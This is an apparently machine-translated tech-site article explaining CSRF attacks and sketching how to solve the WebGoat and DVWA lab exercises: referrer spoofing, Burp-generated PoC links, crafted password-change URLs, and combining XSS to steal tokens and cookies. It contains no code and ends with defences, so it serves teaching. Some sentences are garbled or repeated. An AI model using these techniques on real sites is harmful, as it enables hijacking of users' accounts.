Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to understand CSRF. Many people may not know much about it. In order to let you know more, Xiaobian summarizes the following contents for you. I hope you can gain something according to this article.

CSRF is a cross-site request forgery, which does not attack the website server, but impersonates the normal operation of the user in the site. This is usually caused by the server not filtering the request header properly. CSRF will cause password reset, user forgery and other problems, which may lead to serious consequences.

We know that most websites identify users through cookies and other means, and then authorize them. So the best way to fake a user's normal actions is to get the user to make a request natively (i.e., on the browser side with the identity cookie) that the user doesn't know about through XSS or link spoofing. CSRF attacks allow users to unknowingly attack systems they have logged on.

CSRF attacks aim to abuse basic Web functionality. If the website can cause state changes on the server, such as changing the victim's email address or password, or purchasing something, forcing the victim to retrieve data, etc. CSRF attacks modify the state of the target. In this process, the victim performs these attacks on behalf of the attacker, no response is received from the attacker, and the victim performs these attacks on behalf of the attacker.

In a Cross-Site Request Forgery (CSRF) attack, an attacker injects network requests via the user's browser to compromise the integrity of the user's session with a website. Browser security policies allow websites to send HTTP requests to any network address. This policy allows an attacker who controls the content presented by the browser to exploit other resources under the control of this user.

When you need to modify page parameters, you can use burpsuit to generate csrf poc for poc testing. After the test is completed, you must verify that the browser has executed the poc test we generated to make the data change.

CSRF can be associated with XSS, XSS gets cookies, CSRF forges cross-site request completion instructions. Webgoat, DVWA, webug and other platforms have CSRF related exercises. Here are some simple CSRF application scenarios.

Webgoat

CSRF in Webgoat is classified as Request Forgery:

For example, by modifying the host address of the referrer, other hosts can perform functions such as sending comments and modifying passwords on their behalf.

Or use burpsuit to generate csrf poc and induce other users to click on the generated poc link, thus allowing other users to perform the actions designed in the poc.

In addition to generating poc to induce other users to execute, and modifying request headers, it can also be combined with xss to steal cookies and perform other operations.

In webgoat by modifying the referrer

Or use burpsuit to generate poc and induce other users to perform the operation

DVWA

CSRF topics in DVWA are more targeted than topics in webgoat.

URL of Low level is of type get, and the purpose of changing user password can be realized by directly constructing url. Therefore, we can construct the corresponding url to induce the victim to click, so as to achieve the purpose of modifying the victim password.

Medium modifies the referrer parameter to include the hostname in host to bypass detection of the referrer.

HIGH level, directly modify the password, will prompt "CSRF token is incorrect", that is, you need to obtain token for authentication, can complete CSRF. In this case, XSS is combined with csrf, which uses xss to obtain tokens, and csrf uses cookies obtained by xss to inject.

All in all, CSRF is a relatively simple vulnerability. CSRF can be effectively reduced by improving security awareness and increasing token and referer authentication.

After reading the above, do you have any further understanding of how to understand CSRF? If you still want to know more knowledge or related content, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.